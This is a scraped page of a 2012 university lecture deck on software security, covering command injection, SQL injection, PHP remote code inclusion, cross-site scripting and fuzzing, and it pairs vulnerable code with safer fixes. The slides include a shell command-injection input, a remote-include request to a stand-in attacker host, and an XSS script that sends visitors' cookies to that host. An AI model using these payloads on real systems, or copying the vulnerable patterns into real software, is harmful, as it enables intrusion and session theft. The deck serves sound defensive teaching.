so ware security
play

So#ware Security CS461/ECE422 Spring 2012 Reading - PowerPoint PPT Presentation

Jan 25, 2023 •234 likes •602 views

So#ware Security CS461/ECE422 Spring 2012 Reading Material Chapter 12 of the text Outline Review common vulnerabiliDes in programs Input Checking

  1. So#ware ¡Security ¡ CS461/ECE422 ¡ Spring ¡2012 ¡

  2. Reading ¡Material ¡ • Chapter ¡12 ¡of ¡the ¡text ¡

  3. Outline ¡ • Review ¡common ¡vulnerabiliDes ¡in ¡programs ¡ • Input ¡Checking ¡ • Program ¡Logic ¡Errors ¡ • Errors ¡InteracDng ¡with ¡the ¡OS ¡ • Output ¡handling ¡

  4. So#ware ¡VulnerabiliDes ¡ • Generally ¡a ¡result ¡of ¡poor ¡programming ¡ pracDces. ¡ • OWASP ¡top ¡10 ¡Web ¡ApplicaDon ¡Security ¡risks ¡ – hOps://www.owasp.org/index.php/ Category:OWASP_Top_Ten_Project ¡ – A ¡good ¡number ¡are ¡developer ¡bugs ¡ ¡

  5. Security ¡in ¡Design ¡and ¡Architecture ¡ • Security ¡concerns ¡must ¡be ¡considered ¡up ¡front ¡ • Security ¡impacts ¡system ¡architecture ¡ ¡ – Perhaps ¡re-­‑architect ¡to ¡ameliorate ¡security ¡ concerns ¡ – Security ¡architecture ¡can ¡be ¡used ¡to ¡drive ¡tesDng ¡ – True ¡even ¡for ¡projects ¡with ¡no ¡“security ¡features” ¡ • Leaving ¡security ¡to ¡the ¡test ¡phase ¡(or ¡later) ¡is ¡ not ¡a ¡good ¡idea ¡to ¡say ¡the ¡least ¡

  6. Defensive ¡Programming ¡or ¡ ¡ Secure ¡Coding ¡ • Mostly ¡good ¡so#ware ¡engineering ¡ – Except ¡when ¡considering ¡security ¡must ¡consider ¡a ¡ malicious ¡actor ¡ – TradiDonal ¡so#ware ¡engineering ¡concentrates ¡ dealing ¡with ¡errors ¡due ¡to ¡accidents ¡ • Goal ¡ – ConDnued ¡funcDoning ¡of ¡so#ware ¡in ¡spite ¡of ¡ unforeseeable ¡usage ¡of ¡said ¡so#ware. ¡ • Conflicts ¡with ¡Dme ¡to ¡market ¡

  7. Make ¡No ¡AssumpDons! ¡ • Don’t ¡assume ¡the ¡user ¡won’t ¡enter ¡more ¡than ¡ 512 ¡characters ¡on ¡the ¡command ¡line ¡ • Don’t ¡that ¡there ¡will ¡always ¡be ¡enough ¡disk ¡ space ¡ • OR ¡codify ¡and ¡enforce ¡your ¡assumpDons ¡

  8. Handling ¡User ¡Input ¡ • This ¡is ¡where ¡the ¡user ¡(malicious ¡or ¡innocent) ¡ can ¡directly ¡impact ¡the ¡program ¡ – Always ¡verify ¡the ¡user ¡input ¡ – White ¡list ¡expected ¡results ¡ • Input ¡can ¡come ¡from ¡a ¡number ¡of ¡places ¡ – Text ¡entry ¡ – ConfiguraDon ¡files ¡ – Environment ¡variables ¡ – Network ¡

  9. InjecDon ¡AOacks ¡ • Error ¡in ¡input ¡handling ¡that ¡results ¡in ¡ unexpected ¡execuDon ¡flow ¡ • O#en ¡occurs ¡in ¡scripDng ¡languages ¡ – Script ¡writer ¡expects ¡user ¡input ¡to ¡be ¡data ¡ – But ¡user ¡inputs ¡text ¡that ¡will ¡be ¡interpreted ¡as ¡ code ¡

  10. Unsafe ¡Perl ¡Script ¡ 1 #!/usr/bin/perl 2 # finger.cgi - finger CGI script using Perl5 CGI module 3 4 use CGI; 5 use CGI::Carp qw(fatalsToBrowser); 6 $q = new CGI; # create query object 7 8 # display HTML header 9 print $q->header, 10 $q->start_html('Finger User'), 11 $q->h1('Finger User'); 12 print "<pre>"; 13 14 # get name of user and display their finger details 15 $user = $q->param("user"); 16 print `/usr/bin/finger -sh $user`; 17 18 # display HTML footer 19 print "</pre>"; 20 print $q->end_html;

  11. Running ¡Script ¡ • With ¡user ¡= ¡lpb ¡ • Finger ¡user ¡ Login ¡ ¡Name ¡ ¡ lpb ¡ ¡Lawrie ¡Brown ¡ • With ¡user=‘xxx; ¡echo ¡aOack ¡success; ¡ls ¡finger*’ ¡ • Finger ¡User ¡ aOack ¡success ¡ finger.cgi ¡ ¡finger.html ¡ • Command ¡injecDon. ¡ ¡Running ¡arbitrary ¡ commands ¡at ¡the ¡privilege ¡of ¡the ¡web ¡user ¡id. ¡

  12. Safer ¡Script ¡ • counter ¡aOack ¡by ¡validaDng ¡input ¡ – compare ¡to ¡paOern ¡that ¡rejects ¡invalid ¡input ¡ – see ¡example ¡addiDons ¡to ¡script: ¡ 14 # get name of user and display their finger details 15 $user = $q->param("user"); 16 die "The specified user contains illegal characters!" 17 unless ($user =~ /^\w+$/); 18 print `/usr/bin/finger -sh $user`;

  13. SQL ¡InjecDon ¡ • Or ¡why ¡is ¡this ¡XKCD ¡comic ¡funny ¡ – hOp://xkcd.com/327/ ¡

  14. SQL ¡InjecDon ¡ • another ¡widely ¡exploited ¡injecDon ¡aOack ¡ • when ¡input ¡used ¡in ¡SQL ¡query ¡to ¡database ¡ – similar ¡to ¡command ¡injecDon ¡ ¡ – SQL ¡meta-­‑characters ¡are ¡the ¡concern ¡ – must ¡check ¡and ¡validate ¡input ¡for ¡these ¡ $name = $_REQUEST['name']; $query = “SELECT * FROM suppliers WHERE name = '" . $name . "';" $result = mysql_query($query); $name = $_REQUEST['name']; $query = “SELECT * FROM suppliers WHERE name = '" . mysql_real_escape_string($name) . "';" $result = mysql_query($query);

  15. Code ¡InjecDon ¡ • further ¡variant ¡ • input ¡includes ¡code ¡that ¡is ¡then ¡executed ¡ – see ¡PHP ¡remote ¡code ¡injecDon ¡vulnerability ¡ • variable ¡+ ¡global ¡field ¡variables ¡+ ¡remote ¡include ¡ – this ¡type ¡of ¡aOack ¡is ¡widely ¡exploited ¡ <?php include $path . 'functions.php'; include $path . 'data/prefs.php'; GET /calendar/embed/day.php?path=http://hacker.web.site/hack.txt?&cmd=ls

  16. Cross ¡Site ¡ScripDng ¡(XSS) ¡ l Goal ¡– ¡Inject ¡malicious ¡code ¡into ¡web ¡pages ¡ viewed ¡by ¡others. ¡ - Sites ¡that ¡allow ¡HTML ¡formaOed ¡user ¡input ¡to ¡be ¡ stored, ¡e.g. ¡Blog ¡comments, ¡wiki ¡entries. ¡ - Enter ¡the ¡following ¡into ¡a ¡form ¡that ¡then ¡shows ¡ the ¡original ¡query ¡in ¡the ¡response. ¡ l <script>confirm("Do ¡you ¡hate ¡purple ¡dinosaurs?");</ script> ¡ 04/10/07 ¡ 16 ¡

  17. XSS ¡Example ¡ • cf. ¡guestbooks, ¡wikis, ¡blogs ¡etc ¡ • where ¡comment ¡includes ¡script ¡code ¡ – e.g. ¡to ¡collect ¡cookie ¡details ¡of ¡viewing ¡users ¡ • need ¡to ¡validate ¡data ¡supplied ¡ – including ¡handling ¡various ¡possible ¡encodings ¡ • aOacks ¡both ¡input ¡and ¡output ¡handling ¡ Thanks for this information, its great! <script>document.location='http://hacker.web.site/cookie.cgi?'+ document.cookie</script>

  18. Alternate ¡Encodings ¡

  19. Input ¡Checks ¡ • Example ¡of ¡evading ¡input ¡checks ¡ – Samy’s ¡explanaDon ¡of ¡his ¡Myspace ¡worm ¡ – hOp://namb.la/popular/tech.html ¡ • Canonicalize ¡input ¡before ¡performing ¡checks ¡ – Map ¡the ¡mulDple ¡versions ¡of ¡‘A’ ¡to ¡a ¡parDcular ¡value ¡ • Issue ¡for ¡numeric ¡values ¡too ¡ – Is ¡the ¡number ¡16 ¡bits ¡or ¡32? ¡ – Signed ¡or ¡unsigned? ¡ • NegaDve ¡number ¡or ¡large ¡posiDve ¡ ¡

  20. Input ¡Fuzzing ¡ • Generate ¡“random” ¡inputs ¡to ¡test ¡programs ¡ – Environment ¡variables ¡ – Input ¡strings ¡ – Network ¡values ¡ • Could ¡be ¡completely ¡randomized ¡or ¡somewhat ¡ structured ¡ – Minifuzz ¡ – ShareFuzz ¡ – Spike ¡ – MuDynamics ¡ • Standard ¡component ¡of ¡Microso#’s ¡So#ware ¡ Development ¡Lifecycle ¡

  21. More ¡Fuzz ¡-­‑ ¡SPIKE ¡ • An ¡input ¡language ¡for ¡creaDng ¡variant ¡network ¡ packets ¡ • From ¡WireShark ¡output, ¡make ¡it ¡easy ¡to ¡express ¡new ¡ packets ¡ – a_binary(“00 ¡01 ¡02 ¡03”) ¡ Data: ¡<00 ¡01 ¡02 ¡03> ¡ – a_block_size_big-­‑endian_word(“Blockname”); ¡ Data: ¡<00 ¡01 ¡02 ¡03 ¡00 ¡00 ¡00 ¡00> ¡ – a_block_start(“Blockname”) ¡ a_binary(“05 ¡06 ¡07 ¡08”) ¡ Data: ¡<00 ¡01 ¡02 ¡03 ¡00 ¡00 ¡00 ¡00 ¡05 ¡06 ¡07 ¡08> ¡ – a_block_end(“Blockname”); ¡ Data: ¡<00 ¡01 ¡02 ¡03 ¡00 ¡00 ¡00 ¡04 ¡05 ¡06 ¡07 ¡08> ¡

  22. WriDng ¡Correct/Safe ¡Code ¡ • Is ¡your ¡algorithm ¡correct? ¡ – Incorrect ¡use ¡of ¡random ¡number ¡generators ¡ • Bad ¡seeds ¡ • E.g. ¡Code ¡Red ¡and ¡Netscape ¡ • TCP ¡session ¡hijacking ¡ – How ¡random ¡is ¡the ¡sequence ¡number? ¡ • Leaving ¡in ¡test ¡code ¡ – Used ¡by ¡Morris ¡Worm ¡

  23. Is ¡there ¡a ¡bug ¡in ¡the ¡compiler? ¡ • Ken ¡Thompson ¡Trojan ¡compiler ¡example ¡ • Required ¡for ¡higher ¡levels ¡of ¡Common ¡Criteria ¡ – Correspondence ¡of ¡design, ¡source, ¡and ¡object ¡ code. ¡ ¡

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

CS 5150 So(ware Engineering 14. Security William Y. Arms Security in the So(ware Development

CS 5150 So(ware Engineering 14. Security William Y. Arms Security in the So(ware Development

Cornell University Compu1ng and Informa1on Science CS 5150 So(ware Engineering 14. Security William Y. Arms Security in the So(ware Development Process The security goal The security goal is to make sure that the agents (people or external

489 views • 24 slides
Take Two So)ware Updates and See Me in the Morning:

Take Two So)ware Updates and See Me in the Morning:

Take Two So)ware Updates and See Me in the Morning: The Case for So,ware Security Evalua6ons of Medical Devices Steve Hanna 1 , Rolf Rolles 4 , Andres

259 views • 15 slides
CS 5150 So(ware Engineering Security William Y. Arms

CS 5150 So(ware Engineering Security William Y. Arms

Cornell University Compu1ng and Informa1on Science CS 5150 So(ware Engineering Security William Y. Arms Suggested Readings Butler W. Lampson ,

745 views • 16 slides
CS 5150 So(ware Engineering 2. Steps in the so(ware development process William Y. Arms So(ware

CS 5150 So(ware Engineering 2. Steps in the so(ware development process William Y. Arms So(ware

Cornell University Compu1ng and Informa1on Science CS 5150 So(ware Engineering 2. Steps in the so(ware development process William Y. Arms So(ware Process Fundamental Assump1on: Good processes lead to good so(ware Good processes reduce risk

260 views • 22 slides
So=ware Security using Language Engineering and mbeddr Markus

So=ware Security using Language Engineering and mbeddr Markus

Towards improving So=ware Security using Language Engineering and mbeddr Markus Vlter, Zaur Molotnikov, Bernd Kolb voelter@acm.org www.voelter.de @markusvoelter

703 views • 55 slides
So#ware(Project Lecture'4 Wouter'Swierstra So#ware(project((Lecture(4 1 Last%&amp;me

So#ware(Project Lecture'4 Wouter'Swierstra So#ware(project((Lecture(4 1 Last%&amp;me

So#ware(Project Lecture'4 Wouter'Swierstra So#ware(project((Lecture(4 1 Last%&amp;me Risks So(ware-architecture So#ware(project((Lecture(4 2 Working(effec,vely(with(git(and(GitHub. So#ware(project((Lecture(4 3

632 views • 45 slides
So#ware(Project Lecture'3 Wouter'Swierstra So#ware(project((Lecture(3 1 Last%&amp;me

So#ware(Project Lecture'3 Wouter'Swierstra So#ware(project((Lecture(3 1 Last%&amp;me

So#ware(Project Lecture'3 Wouter'Swierstra So#ware(project((Lecture(3 1 Last%&amp;me Scrum'planning Product'backlog So#ware(project((Lecture(3 2 Working(effec,vely(with(git(and(GitHub. So#ware(project((Lecture(3 3

485 views • 36 slides
So%ware Architecture Beyond the Blueprints Aligning So%ware Architecture with the facets of

So%ware Architecture Beyond the Blueprints Aligning So%ware Architecture with the facets of

So%ware Architecture Beyond the Blueprints Aligning So%ware Architecture with the facets of So%ware Development Business, Management, Engineering and OrganizaCon Eldo Architect, Philips Healthcare eldo.issac@philips.com SATURN 2009,

130 views • 10 slides
CS 5150 So(ware Engineering Steps in the So(ware Development

CS 5150 So(ware Engineering Steps in the So(ware Development

Cornell University Compu1ng and Informa1on Science CS 5150 So(ware Engineering Steps in the So(ware Development Process William Y. Arms

477 views • 21 slides
CS 5150 So(ware Engineering 18. Reuse and Design Pa9erns William Y. Arms So(ware Reuse It is

CS 5150 So(ware Engineering 18. Reuse and Design Pa9erns William Y. Arms So(ware Reuse It is

Cornell University Compu1ng and Informa1on Science CS 5150 So(ware Engineering 18. Reuse and Design Pa9erns William Y. Arms So(ware Reuse It is o(en good to design a program to reuse exisCng components. This can lead to be9er so(ware at

668 views • 48 slides
CS 5150 So(ware Engineering Three Types of So(ware Process

CS 5150 So(ware Engineering Three Types of So(ware Process

Cornell University Compu1ng and Informa1on Science CS 5150 So(ware Engineering Three Types of So(ware Process William Y. Arms Types of

736 views • 25 slides
CS 5150 So(ware Engineering 1. So(ware Development in Prac:ce William Y. Arms Overall Aim of the

CS 5150 So(ware Engineering 1. So(ware Development in Prac:ce William Y. Arms Overall Aim of the

Cornell University Compu1ng and Informa1on Science CS 5150 So(ware Engineering 1. So(ware Development in Prac:ce William Y. Arms Overall Aim of the Course We assume that you are technically proficient. You know a good deal about

491 views • 22 slides
Toward so)ware engineering in prac0ce Claire Le Goues 15-214 April 27, 2017 1 Learning Goals

Toward so)ware engineering in prac0ce Claire Le Goues 15-214 April 27, 2017 1 Learning Goals

Toward so)ware engineering in prac0ce Claire Le Goues 15-214 April 27, 2017 1 Learning Goals Broad scope of so;ware engineering Importance of nontechnical issues IntroducCon to key challenges 2 So)ware is Everywhere So)ware is

1.01k views • 86 slides
So#ware Scaling Mo/va/on &amp; Goals HW Configura/on &amp; Scale Out So#ware Scaling

So#ware Scaling Mo/va/on &amp; Goals HW Configura/on &amp; Scale Out So#ware Scaling

So#ware Scaling Mo/va/on &amp; Goals HW Configura/on &amp; Scale Out So#ware Scaling Efforts System management Opera/ng system Programming environment PreAcceptance Work HW stabiliza/on &amp; early scaling

390 views • 19 slides
So)ware Security: Vulnerability Analysis Dawn Song Finding

So)ware Security: Vulnerability Analysis Dawn Song Finding

Computer Security Course. Dawn

539 views • 32 slides
T * est Tanja E. J. Vos So#ware Tes+ng and Quality Group

T * est Tanja E. J. Vos So#ware Tes+ng and Quality Group

Test Automa+on at the useR interface level T * est Tanja E. J. Vos So#ware Tes+ng and Quality Group Research center for So#ware Produc+on Methods

889 views • 68 slides
C ONFERENCE 2015 Impacts on Master Teaching Fellows Leadership Skills and Teacher Research

C ONFERENCE 2015 Impacts on Master Teaching Fellows Leadership Skills and Teacher Research

N OYCE M IDWEST C ONFERENCE 2015 Impacts on Master Teaching Fellows Leadership Skills and Teacher Research Skills Community of Problem Solvers: Kristal Deming, Tammy Patterson &amp; Selena Sasser GOALS FOR THIS AFTERNOON Noyce in

469 views • 29 slides
ts

ts

s rt Prr ss tt sts trr s

541 views • 50 slides
Geolocation http://www.cardiffmiller.com/artworks/walks/index.html

Geolocation http://www.cardiffmiller.com/artworks/walks/index.html

Geolocation http://www.cardiffmiller.com/artworks/walks/index.html https://www.youtube.com/watch?v=sOkQE7m31Pw Janet Cardiff and George Bures Miller, Walks A stranger gives you a small card with an unfamiliar phone number written on the back,

874 views • 15 slides
Homework 2 DHCP NAT FIREWALL Due 4/18 Basic Architecture Web1 Web2 $int_if Detailed

Homework 2 DHCP NAT FIREWALL Due 4/18 Basic Architecture Web1 Web2 $int_if Detailed

Homework 2 DHCP NAT FIREWALL Due 4/18 Basic Architecture Web1 Web2 $int_if Detailed Architecture 172.16.0.2/24 carp $ext_if 172.16.0.1/24 Web1 172.16.0.100/24 Web2 172.16.0.101/24 $int_if $ext_if 172.16.0.3/24 carp 172.16.0.1/24

336 views • 7 slides
Logic and Knowledge Representation L a n g u a g e P r o c e s s i n g , M e

Logic and Knowledge Representation L a n g u a g e P r o c e s s i n g , M e

Logic and Knowledge Representation L a n g u a g e P r o c e s s i n g , M e t a - p r o g r a m m i n g 1 J u n e 2 0 1 8 G i o v a n n i S i l e n o g s i l e n o @e n s t . f

945 views • 53 slides
Amazons Database Migration Service, a magical wand for moving from closed source solutions ?

Amazons Database Migration Service, a magical wand for moving from closed source solutions ?

Amazons Database Migration Service, a magical wand for moving from closed source solutions ? Dimitri Vanoverbeke Solution Engineer @ Percona Who Am I I am your innocent Percona Solution Engineer. Living in Ghent, Belgium

480 views • 29 slides
CEE 680 Lecture #25 3/4/2020 Print version Updated: 4 March 2020 Lecture #25 Dissolved Carbon

CEE 680 Lecture #25 3/4/2020 Print version Updated: 4 March 2020 Lecture #25 Dissolved Carbon

CEE 680 Lecture #25 3/4/2020 Print version Updated: 4 March 2020 Lecture #25 Dissolved Carbon Dioxide: Open &amp; Closed Systems VI (Stumm &amp; Morgan, Chapt.4 ) Benjamin; Chapter 7 David Reckhow CEE 680 #25 1 Lake Erie David Reckhow

503 views • 7 slides
Modeling Principles and Modeling Foundatjons in RobMoSys Composable Models and Sofuware for

Modeling Principles and Modeling Foundatjons in RobMoSys Composable Models and Sofuware for

Modeling Principles and Modeling Foundatjons in RobMoSys Composable Models and Sofuware for Robotjcs Systems Towards an EU Digital Industrial Platgorm for Robotjcs Tutorial at ACM / IEEE 21 st Int. Conf. On Model Driven Engineering Languages

493 views • 23 slides

More recommend